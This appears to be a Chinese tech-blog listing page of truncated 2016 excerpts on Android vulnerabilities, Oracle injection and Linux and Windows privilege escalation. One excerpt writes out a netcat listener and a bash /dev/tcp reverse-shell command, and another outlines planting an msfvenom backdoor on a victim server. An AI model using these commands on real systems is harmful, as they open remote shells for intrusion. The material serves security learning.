Android系统本周曝出了两个新的高危漏洞,影响大量设备,很多设备可 能永远得不到修复的机会(app开发ty300.com)。第一个漏洞是 Google Project Zero安全团队成员Mark Brand披露的,编号CVE 2016-3861,该漏洞允许攻击者执行恶意程序或本地提权。Bran ...
分类:
移动开发 时间:
2016-09-11 12:58:18
阅读次数:
185
Hacking Oracle PART 3 代码/命令执行:http://www.tuicool.com/articles/A3Yzaq https://www.notsosecure.com/hacking-oracle-11g/ 犀利的 oracle 注入技术 http://www.jb51.n ...
分类:
数据库 时间:
2016-09-09 16:54:03
阅读次数:
1233
上传漏洞、登陆页暴力破解的危害性比较大,因为一旦成功,便等于获得了写文件或更改网站配置的权限,从而方便进一步提权, 下面是针对这两种威胁的防范手段: ...
分类:
Web程序 时间:
2016-09-06 13:43:39
阅读次数:
146
Linux下的漏洞提权 linux下一般都是系统漏洞提权,分为以下几个步骤: 提权 反弹shell 本地:nc -l -p 8000 目标机器:/bin/bash -i >& /dev/tcp/10.10.10.10/8000 0>&1 实例 1、得到系统版本号 centos 7 local roo ...
分类:
系统相关 时间:
2016-09-02 18:58:05
阅读次数:
369
当我们拿到webshell之后,下一步该干什么了?权限提升 水平权限提升(通过控制一个账户来搞定其他的账户) 垂直权限提升(从单一用户权限提升至完全管理权限) 主机权限提升(重点介绍) 一、主机权限提升 1.分类 Linux提权 Windows提权 2.Windows提权(前提是:有操作系统漏洞,其 ...
分类:
其他好文 时间:
2016-08-26 22:49:57
阅读次数:
220
在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门。 然后在到MSF根据刚才配置的木马后门进行监听... 然后在把木马上传到服务器(受害者)的机器里,必须上传 ...
分类:
其他好文 时间:
2016-08-14 16:13:34
阅读次数:
409
社区:i春秋 时间:2016年8月13日14.00 作者:Binghe 前言 经常会有一些基友求提权,那么其实提权的手法也就那些,主要是细心和耐心,我记得‘七百斤的猴子’大表哥他整理过大概的提权技术,虽不是很全面,但很详细。 本文简介 渗透测试的环境千变万化,经常或遇到各种瓶颈,那么小编今天就自己的 ...
分类:
其他好文 时间:
2016-08-13 18:07:22
阅读次数:
175
0x00测试环境 使用环境 备注 操作系统 Ubuntu15.04 虚拟机 内核版本 3.19.0-15-generic 漏洞来源 /fs/overlayfs/inode.c Before 2015.12.11 EXP c 提权 0x01原理分析: 1)概述 通常的内核漏洞我们会想办法通过执行com ...
分类:
其他好文 时间:
2016-08-08 17:30:35
阅读次数:
434
